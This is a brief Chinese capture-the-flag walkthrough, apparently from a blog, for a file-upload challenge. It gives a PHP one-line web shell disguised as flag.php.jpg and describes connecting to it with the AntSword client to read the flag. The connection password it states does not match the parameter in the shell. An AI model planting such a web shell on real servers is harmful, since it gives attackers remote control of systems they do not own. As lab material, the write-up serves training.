题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
wq89738739 分钟前
[AI问答]OpenSSL3.0+上的异步调用缘友一世5 小时前
PentestGPT V2源码研究之EGATS规划器初九之潜龙勿用7 小时前
C# 解决“因为算法不同,客户端和服务器无法通信”的问题0DayHP9 小时前
HTB:DarkZero[WriteUP]一名优秀的码农10 小时前
vulhub系列-52-ICA: 1(超详细)大方子11 小时前
【好靶场】某博客存在SQL注入heze0913 小时前
sqli-labs-Less-61Chockmans14 小时前
春秋云境CVE-2020-25483菩提小狗14 小时前
每日安全情报报告 · 2026-04-01三七吃山漆15 小时前
BUUCTF[极客大挑战 2019]Http